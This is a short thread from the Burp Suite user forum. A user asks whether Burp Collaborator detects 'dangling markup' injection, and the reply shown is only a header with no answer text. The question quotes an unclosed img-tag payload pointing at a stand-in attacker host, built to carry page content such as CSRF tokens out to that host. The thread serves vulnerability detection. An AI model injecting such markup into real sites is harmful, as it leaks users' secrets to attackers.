The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Does Burp Collaborator test for "dangling markup" vulnerabilities?

McGuire, | Last updated: Apr 03, 2017 10:55PM UTC

This article on github (https://githubengineering.com/githubs-post-csp-journey/?utm_source=webopsweekly&utm_medium=email ) outlines an attack where an attacker injects an unclosed img tag <img src='https://some-evil-site.com/log_csrf?html= which then includes everything until the matching quote in a request to some-evil-site, potentially sending sensitive data. Question, does burp collaborator find issues like this? Thanks

PortSwigger Agent | Last updated: Apr 04, 2017 09:54AM UTC